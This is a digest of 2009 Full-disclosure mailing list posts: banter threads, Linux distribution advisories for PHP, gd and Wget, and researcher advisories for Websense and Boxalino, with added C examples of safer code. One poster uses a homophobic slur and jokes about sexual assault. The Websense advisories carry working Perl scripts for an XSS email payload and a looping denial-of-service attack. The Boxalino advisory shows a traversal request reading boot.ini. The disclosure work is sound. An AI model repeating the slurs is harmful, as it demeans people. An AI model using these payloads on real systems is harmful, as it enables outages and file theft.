Re: [Full-disclosure] Yahoo! apologises for lap dance at hack event
What the fuck is this world coming to. A million plagues to whoever complained. Yahoo don't apologize for shit! The dude in the photo looks sus too, pocket rocket titties right in front and he's looking at the nerds on the sideline. Don't worry faggot, Jesus isn't crying for you. -- ciao JT ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Yahoo! apologises for lap dance at hack event
Yeah, I saw the outcry over this at reddit. To be fair though, "booth babes" are a fairly common part of culture over there. Even street vendors use them.

--Rohit Patnaik

On Tue, Oct 20, 2009 at 10:14 PM, Stack Smasher wrote:
> Why should they apologize?
>
> Hackers love lap dances!
>
> On Tue, Oct 20, 2009 at 9:01 PM, Ivan . wrote:
>
>> yahoo rocks!
>>
>> http://www.brisbanetimes.com.au/technology/technology-news/yahoo-apologises-for-lap-dance-at-hack-event-20091021-h7sr.html
>
> --
> "If you see me laughing, you better have backups"
Re: [Full-disclosure] Yahoo! apologises for lap dance at hack event
Why should they apologize?

Hackers love lap dances!

On Tue, Oct 20, 2009 at 9:01 PM, Ivan . wrote:
> yahoo rocks!
>
> http://www.brisbanetimes.com.au/technology/technology-news/yahoo-apologises-for-lap-dance-at-hack-event-20091021-h7sr.html

--
"If you see me laughing, you better have backups"
[Full-disclosure] Yahoo! apologises for lap dance at hack event
yahoo rocks!

http://www.brisbanetimes.com.au/technology/technology-news/yahoo-apologises-for-lap-dance-at-hack-event-20091021-h7sr.html
Re: [Full-disclosure] milw0rm
str0ke phone home! All of the security industry's pen testers are losing valuable business! Perhaps str0ke is locked up in someone's basement being sodomized by a gimp.

On Tue, Oct 20, 2009 at 7:06 AM, xsr wrote:
>
> The French blog URL was posted in July, I think I've read somewhere that
> str0ke had changed his mind after that to continue milw0rm again. For a
> site, even being referenced by cve.mitre, I still fail to understand the
> current update delay though.
>
> --
> xsr

--
ciao
JT
[Full-disclosure] [ MDVSA-2009:285 ] php
_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2009:285
http://www.mandriva.com/security/
_______________________________________________________________________

Package : php
Date    : October 20, 2009
Affected: 2009.0, 2009.1, Corporate 3.0, Corporate 4.0,
          Enterprise Server 5.0, Multi Network Firewall 2.0
_______________________________________________________________________

Problem Description:

Multiple vulnerabilities have been found and corrected in php:

The _gdGetColors function in gd_gd.c in PHP 5.2.11 and 5.3.0, and the GD Graphics Library 2.x, does not properly verify a certain colorsTotal structure member, which might allow remote attackers to conduct buffer overflow or buffer over-read attacks via a crafted GD file, a different vulnerability than CVE-2009-3293. NOTE: some of these details are obtained from third party information (CVE-2009-3546).

Added two upstream patches to address a bypass vulnerability in open_basedir and safe_mode.

Additionally on CS4 a regression was found and fixed when using the gd-bundled.so variant from the php-gd package.

This update fixes these vulnerabilities.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3546
_______________________________________________________________________

Updated Packages:
[Full-disclosure] [ GLSA 200910-01 ] Wget: Certificate validation error
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200910-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Wget: Certificate validation error
      Date: October 20, 2009
      Bugs: #286058
        ID: 200910-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

An error in the X.509 certificate handling of Wget might enable remote attackers to conduct man-in-the-middle attacks.

Background
==========

GNU Wget is a free software package for retrieving files using HTTP, HTTPS and FTP, the most widely-used Internet protocols.

Affected packages
=================

    -------------------------------------------------------------------
     Package         /  Vulnerable  /                       Unaffected
    -------------------------------------------------------------------
  1  net-misc/wget        < 1.12                               >= 1.12

Description
===========

The vendor reported that Wget does not properly handle Common Name (CN) fields in X.509 certificates that contain an ASCII NUL (\0) character. Specifically, the processing of such fields is stopped at the first occurrence of a NUL character. This type of vulnerability was recently discovered by Dan Kaminsky and Moxie Marlinspike.

Impact
======

A remote attacker might employ a specially crafted X.509 certificate, containing a NUL character in the Common Name field to conduct man-in-the-middle attacks on SSL connections made using Wget.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Wget users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose =net-misc/wget-1.12

References
==========

  [ 1 ] CVE-2009-3490
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3490

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200910-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

License
=======

Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
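The NUL truncation described in the advisory above, as an added C example (not Wget's code and not part of the original post): a C-string comparison stops at the first NUL in the Common Name, while a length-aware check rejects the name. The function names and the constructed CN bytes with placeholder host names are assumptions for illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* Constructed sample: CN bytes as stored in a certificate. ASN.1 strings
 * carry an explicit length, so a NUL byte is legal inside them.
 * Both host names are placeholders. */
static const unsigned char SAMPLE_CN[] = "www.bank.example\0.attacker.example";
#define SAMPLE_CN_LEN (sizeof(SAMPLE_CN) - 1)

/* Flawed pattern: the CN is handled as a C string, so the comparison
 * only ever sees the bytes before the first NUL. */
int cn_matches_truncating(const unsigned char *cn, size_t cn_len,
                          const char *host)
{
    (void)cn_len;                       /* the real length is ignored */
    return strcasecmp((const char *)cn, host) == 0;
}

/* Detection helper: does the CN contain a NUL inside its stated length? */
int cn_has_embedded_nul(const unsigned char *cn, size_t cn_len)
{
    return memchr(cn, '\0', cn_len) != NULL;
}

/* Hardened pattern: reject embedded NULs, then compare over the full
 * stated length (exact host names only; wildcards are out of scope). */
int cn_matches_strict(const unsigned char *cn, size_t cn_len,
                      const char *host)
{
    if (cn_has_embedded_nul(cn, cn_len))
        return 0;
    if (cn_len != strlen(host))
        return 0;
    return strncasecmp((const char *)cn, host, cn_len) == 0;
}

int main(void)
{
    const char *host = "www.bank.example";

    printf("stated CN length : %zu\n", SAMPLE_CN_LEN);
    printf("strlen() sees    : %zu\n", strlen((const char *)SAMPLE_CN));
    printf("truncating match : %d\n",
           cn_matches_truncating(SAMPLE_CN, SAMPLE_CN_LEN, host));
    printf("strict match     : %d\n",
           cn_matches_strict(SAMPLE_CN, SAMPLE_CN_LEN, host));
    return 0;
}
```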
[Full-disclosure] NSOADV-2009-003: Websense Email Security Cross Site Scripting
______________________________________________________________________
Security Advisory NSOADV-2009-003
______________________________________________________________________
______________________________________________________________________

  Title:                  Websense Email Security Cross Site Scripting
  Severity:               Low
  Advisory ID:            NSOADV-2009-003
  Found Date:             28.09.2009
  Date Reported:          01.10.2009
  Release Date:           20.10.2009
  Author:                 Nikolas Sotiriu
  Mail:                   nso-research (at) sotiriu.de
  URL:                    http://sotiriu.de/adv/NSOADV-2009-003.txt
  Vendor:                 Websense (http://www.websense.com/)
  Affected Products:      Websense Email Security v7.1
                          Personal Email Manager v7.1
  Not Affected Products:  Websense Email Security v7.1 Hotfix 4
                          Personal Email Manager v7.1 Hotfix 4
  Remote Exploitable:     Yes
  Local Exploitable:      Yes
  Patch Status:           Patched with Hotfix 4
  Disclosure Policy:      http://sotiriu.de/policy.html
  Thanks to:              Thierry Zoller: for the permission to use his
                          Policy

Background:
===========

Websense Email Security software incorporates multiple layers of real-time Web security and data security intelligence to provide leading email protection from converged email and Web 2.0 threats. It helps to manage outbound data leaks and compliance risk, and enables a consolidated security strategy with the trusted leader in Essential Information Protection.

(Product description from Websense Website)

The Websense Email Security Web Administrator is a webfrontend, which enables you to access the message administration, directory management and to view the log.

Description:
============

1. XSS in webfrontend:
----------------------

The webfrontend does not properly sanitize some variables before being returned to the user.

http://:8181/web/msgList/viewmsg/actions/msgAnalyse.asp \
?Queue=Network%20Security&FileName=[XSS]&IsolatedMessageID=[XSS] \
&ServerName=[XSS]&Dictionary=[XSS]&Scoring=[XSS]&MessagePart=[XSS]

http://:8181/web/msgList/viewmsg/actions/msgForwardToRis \
kFilter.asp?Queue=[XSS]&FileName=[XSS]&IsolatedMessageID=[XSS]& \
ServerName=[XSS]

http://:8181/web/msgList/viewmsg/viewHeaders.asp?Queue= \
[XSS]&FileName=[XSS]&IsolatedMessageID=[XSS]&ServerName=[XSS]

This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of the Web Administrator frontend.

2. XSS in webfrontend through a Mail Subject:
---------------------------------------------

The Subject of an email sent through the Websense Mail Security server is not properly sanitized before shown in the Web Administrator frontend.

Script code like ">alert('X') will be executed in the user's browser in context of the Web Administrator frontend.

The Mail has to be held in a Queue to execute the code if the administrator checks it. A Subject like VIAGRA">alert('XSS') will result in a hold in the Anti Spam Queue.

Proof of Concept :
==================

#!/usr/bin/perl

use MIME::Lite;
use Net::SMTP;

(($server = $ARGV[0]) && ($rcpt = $ARGV[1])) || die "Usage: $0",
" \n";

my $from_address = '';
my $to_address = "<" . $rcpt . ">";
my $mail_host = $server;

my $subject = 'VIAGRA XSS File ">';
my $message_body = "XSS Test File";

$msg = MIME::Lite->new (
  From => $from_address,
  To => $to_address,
  Subject => $subject,
  Type =>'multipart/mixed'
) or die "Error creating multipart container: $!\n";

$msg->attach (
  Type => 'TEXT',
  Data => $message_body
) or die "Error adding the text message part: $!\n";

MIME::Lite->send('smtp', $mail_host, Timeout=>60);
$msg->send;

Solution:
=========

Vendor released a patch.

http://tinyurl.com/yhe3hqa

Disclosure Timeline (YYYY/MM/DD):
=================================

2009.09.28: Vulnerability found
2009.10.01: Ask for a PGP Key
2009.10.01: Websense sent their PGP Key
2009.10.01: Sent PoC, Advisory, Disclosure policy and planned disclosure
            date to Vendor
2009.10.08: Websense verifies the finding
2009.10.13: Websense fixed it. The patch will be available in Version
            7.2 which will be released in ~2 weeks
2009.10.13: Ask for a list of affected versions/products and changed
            the release date to 2009.10.29. (no response)
2009.10.20: Found the KB article and the Hotfix on Websense website
2009.10.20: Release of this advisory
[Full-disclosure] NSOADV-2009-002: Websense Email Security Web Administrator DoS
______________________________________________________________________
Security Advisory NSOADV-2009-002
______________________________________________________________________
______________________________________________________________________

  Title:                  Websense Email Security Web Administrator DoS
  Severity:               Low
  Advisory ID:            NSOADV-2009-002
  Found Date:             28.09.2009
  Date Reported:          01.10.2009
  Release Date:           20.10.2009
  Author:                 Nikolas Sotiriu
  Mail:                   nso-research (at) sotiriu.de
  URL:                    http://sotiriu.de/adv/NSOADV-2009-002.txt
  Vendor:                 Websense (http://www.websense.com/)
  Affected Products:      Websense Email Security v7.1
                          Personal Email Manager v7.1
  Not Affected Products:  Websense Email Security v7.1 Hotfix 4
                          Personal Email Manager v7.1 Hotfix 4
  Remote Exploitable:     Yes
  Local Exploitable:      Yes
  Patch Status:           Patched with Hotfix 4
  Disclosure Policy:      http://sotiriu.de/policy.html
  Thanks to:              Thierry Zoller: for the permission to use his
                          Policy

Background:
===========

Websense Email Security software incorporates multiple layers of real-time Web security and data security intelligence to provide leading email protection from converged email and Web 2.0 threats. It helps to manage outbound data leaks and compliance risk, and enables a consolidated security strategy with the trusted leader in Essential Information Protection.

(Product description from Websense Website)

The Websense Email Security Web Administrator is a webfrontend, which enables you to access the message administration, directory management and to view the log.

Description:
============

The Web Administrator frontend (STEMWADM.EXE) listens by default on port TCP/8181.

If an attacker sends an HTTP Request to port 8181 without waiting for a response the webserver crashes.

The proof of concept script just sends a "GET /index.asp" and closes the socket. The server cannot respond to the request anymore and dies.

By default the service will always restart after a crash. So the poc will send the request until it will be stopped.

Proof of Concept :
==================

#!/usr/bin/perl

use Socket;

(($target = $ARGV[0]) && ($port = $ARGV[1])) || die "Usage: $0 ",
" \n";

print "\nThe Webserver on http://$target:$port should be dead until",
"this script is running\n";

while (1) {
  $ip = inet_aton($target) || die "host($target) not found.\n";
  $sockaddr = pack_sockaddr_in($port, $ip);
  socket(SOCKET, PF_INET, SOCK_STREAM, 0) || die "socket error.\n";
  connect(SOCKET, $sockaddr) || die "connect $target $port error.\n";
  print SOCKET "GET /index.asp";
  print "Request sent ...\n";
  close(SOCKET);
  sleep 1;
};

Solution:
=========

Vendor released a patch.

http://tinyurl.com/yhe3hqa

Disclosure Timeline (YYYY/MM/DD):
=================================

2009.09.28: Vulnerability found
2009.10.01: Ask for a PGP Key
2009.10.01: Websense sent their PGP Key
2009.10.01: Sent PoC, Advisory, Disclosure policy and planned disclosure
            date to Vendor
2009.10.08: Websense was not able to reproduce the DoS Problem
2009.10.08: Sent a mail with more explanation
2009.10.13: Websense verifies the finding and fixed it. The patch will
            be available in Version 7.2 which will be released in
            ~2 weeks
2009.10.13: Ask for a list of affected versions/products and changed
            the release date to 2009.10.29. (no response)
2009.10.20: Found the KB article and the Hotfix on Websense website
2009.10.20: Release of this advisory
[Full-disclosure] [ MDVSA-2009:284 ] gd
_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2009:284
http://www.mandriva.com/security/
_______________________________________________________________________

Package : gd
Date    : October 20, 2009
Affected: 2009.0, 2009.1, Corporate 3.0, Corporate 4.0,
          Enterprise Server 5.0, Multi Network Firewall 2.0
_______________________________________________________________________

Problem Description:

A vulnerability has been found and corrected in gd:

The _gdGetColors function in gd_gd.c in PHP 5.2.11 and 5.3.0, and the GD Graphics Library 2.x, does not properly verify a certain colorsTotal structure member, which might allow remote attackers to conduct buffer overflow or buffer over-read attacks via a crafted GD file, a different vulnerability than CVE-2009-3293. NOTE: some of these details are obtained from third party information (CVE-2009-3546).

This update fixes this vulnerability.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3546
_______________________________________________________________________

Updated Packages:
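The class of bug named in MDVSA-2009:285 and MDVSA-2009:284 (CVE-2009-3546), as an added C example that is not libgd or PHP source and not part of either advisory: a colour count read from the file is trusted as a loop bound over fixed-size tables, and the hardened reader validates it first. The header layout, struct, function names and sample bytes are simplified assumptions.

```c
#include <stddef.h>
#include <stdio.h>

#define MAX_COLORS 256   /* size of the fixed palette tables (assumed) */

enum { PAL_OK = 0, PAL_TRUNCATED = -1, PAL_BAD_COUNT = -2 };

struct image {
    int colors_total;
    unsigned char red[MAX_COLORS], green[MAX_COLORS], blue[MAX_COLORS];
    int open[MAX_COLORS];            /* 1 = palette slot unused */
};

/* Assumed layout: 2-byte big-endian colour count, then count * 3 RGB bytes. */

/* Flawed pattern, shown for contrast only: the count from the file bounds
 * both the reads from buf (over-read) and the writes to the tables
 * (overflow once count exceeds MAX_COLORS). */
void load_palette_unchecked(struct image *im, const unsigned char *buf)
{
    unsigned count = ((unsigned)buf[0] << 8) | buf[1];
    im->colors_total = (int)count;
    for (unsigned i = 0; i < count; i++) {
        im->red[i]   = buf[2 + 3 * i];
        im->green[i] = buf[3 + 3 * i];
        im->blue[i]  = buf[4 + 3 * i];
        im->open[i]  = 0;
    }
}

/* Hardened pattern: validate the count against the table size and the
 * remaining input before touching the image. */
int load_palette_checked(struct image *im, const unsigned char *buf, size_t len)
{
    if (len < 2)
        return PAL_TRUNCATED;
    unsigned count = ((unsigned)buf[0] << 8) | buf[1];
    if (count > MAX_COLORS)
        return PAL_BAD_COUNT;        /* would write past the tables */
    if ((len - 2) / 3 < count)
        return PAL_TRUNCATED;        /* would read past the input */
    for (unsigned i = 0; i < MAX_COLORS; i++) {
        im->open[i] = (i >= count);
        if (i < count) {
            im->red[i]   = buf[2 + 3 * i];
            im->green[i] = buf[3 + 3 * i];
            im->blue[i]  = buf[4 + 3 * i];
        }
    }
    im->colors_total = (int)count;
    return PAL_OK;
}

/* Constructed sample inputs. */
static const unsigned char SAMPLE_OK[]        = {0x00, 0x02, 0xff, 0, 0, 0, 0, 0xff};
static const unsigned char SAMPLE_BAD_COUNT[] = {0x04, 0x00, 0x11, 0x22, 0x33};
static const unsigned char SAMPLE_SHORT[]     = {0x00, 0x03, 0x11, 0x22, 0x33};
struct image sample_image;

int main(void)
{
    printf("valid file     : %d\n",
           load_palette_checked(&sample_image, SAMPLE_OK, sizeof SAMPLE_OK));
    printf("count 1024     : %d\n",
           load_palette_checked(&sample_image, SAMPLE_BAD_COUNT, sizeof SAMPLE_BAD_COUNT));
    printf("truncated data : %d\n",
           load_palette_checked(&sample_image, SAMPLE_SHORT, sizeof SAMPLE_SHORT));
    return 0;
}
```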
Re: [Full-disclosure] milw0rm
The French blog URL was posted in July, I think I've read somewhere that str0ke had changed his mind after that to continue milw0rm again. For a site, even being referenced by cve.mitre, I still fail to understand the current update delay though.

--
xsr
[Full-disclosure] [CVE-2009-1479] Boxalino - Directory Traversal Vulnerability
#############################################################
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#############################################################
#
# Product: Boxalino
# Vendor:  Boxalino AG (www.boxalino.com)
# CVD ID:  CVE-2009-1479
# Subject: Directory Traversal Vulnerabilities
# Risk:    High
# Effect:  Remotely exploitable
# Author:  Axel Neumann
# Date:    2009-10-20
#
#############################################################

Introduction
------------
A Directory Traversal vulnerability exists in the collaboration platform Boxalino [1]. Remote exploitation of a directory traversal vulnerability in Boxalino's product allows attackers to read arbitrary files on the server file system with web server privileges.

Affected
--------
Vulnerable:
 * Boxalino (closed-source product)

Not vulnerable:
 * Unknown

Not tested:
 * N/A

Technical Description
---------------------
When handling HTTP requests, Boxalino does not properly check for directory traversal specifiers. Therefore, by including a sequence such as "../../../", an attacker is able to read files outside of the intended location. The vulnerability exists for both Windows and UNIX based systems.

POST /boxalino/client/desktop/default.htm HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: curl/7.15.5 (i686-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5
Host: www.example.ch
Content-Length: 256
Cookie: JSESSIONID=A57AABD5F2051C4333F500EBB1232295
Connection: Close
Pragma: no-cache

url=../../../../../../../../boot.ini&login_loginName=example&login_loginPassword=example&login_cmd_logon=Login&defaultAction=Example&login_cmd_logon_resultPage=%2Fboxalino%2Fclient%2Fdesktop%2Fdefault%2Ehtm

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Content-Type: text/html
Content-Length: 208
Date: Wed, 29 Apr 2009 09:01:06 GMT
Connection: close

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Standard" /noexecute=optout /fastdetect

Workaround / Fix
----------------
Update to Boxalino Version 09.05.25-0421

Timeline
--------
2009-10-20: Advisory Release
2009-05-26: Release of fixed Boxalino Version / Patch
2009-05-25: Initial vendor response
2009-04-30: Initial vendor notification
2009-04-29: Assigned CVE-2009-1479
2009-04-29: Discovery by Axel Neumann

References
----------
[1] http://www.boxalino.com/
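A containment check for a request value such as the `url` field in the advisory above, as an added C example (not Boxalino code and not part of the original post): the path is normalized lexically, with both `/` and `\` treated as separators because the advisory covers Windows and UNIX, and anything that climbs above the document root is rejected. The function names and sample inputs are assumptions, and the input is assumed to be percent-decoded exactly once already.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_DEPTH 32

static int is_sep(char c) { return c == '/' || c == '\\'; }

/* Writes the normalized, root-relative form of req into out.
 * Returns 0 on success, -1 if the path escapes the root or is unusable.
 * This is a lexical check only: after joining the result with the real
 * root, resolve symlinks (e.g. realpath()) and re-check the prefix. */
int normalize_under_root(const char *req, char *out, size_t outsz)
{
    size_t starts[MAX_DEPTH];  /* length of out before each kept segment */
    size_t depth = 0, len = 0;

    if (outsz == 0)
        return -1;
    out[0] = '\0';

    while (*req) {
        while (is_sep(*req))
            req++;                          /* also drops a leading "/" */
        const char *seg = req;
        while (*req && !is_sep(*req))
            req++;
        size_t n = (size_t)(req - seg);
        if (n == 0)
            break;                          /* trailing separators */
        if (n == 1 && seg[0] == '.')
            continue;
        if (n == 2 && seg[0] == '.' && seg[1] == '.') {
            if (depth == 0)
                return -1;                  /* would climb above the root */
            len = starts[--depth];
            out[len] = '\0';
            continue;
        }
        if (memchr(seg, ':', n) != NULL)
            return -1;                      /* drive letters, NTFS streams */
        if (depth == MAX_DEPTH || len + n + 2 > outsz)
            return -1;
        starts[depth++] = len;
        if (len)
            out[len++] = '/';
        memcpy(out + len, seg, n);
        len += n;
        out[len] = '\0';
    }
    return len ? 0 : -1;                    /* empty result is the root itself */
}

/* Convenience wrapper: normalized path in a static buffer, or NULL. */
const char *safe_path(const char *req)
{
    static char buf[256];
    return normalize_under_root(req, buf, sizeof buf) == 0 ? buf : NULL;
}

int main(void)
{
    const char *samples[] = {           /* constructed inputs */
        "../../../../../../../../boot.ini",
        "docs/../client/./desktop/default.htm",
        "docs\\..\\..\\boot.ini",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        const char *p = safe_path(samples[i]);
        printf("%-40s -> %s\n", samples[i], p ? p : "(rejected)");
    }
    return 0;
}
```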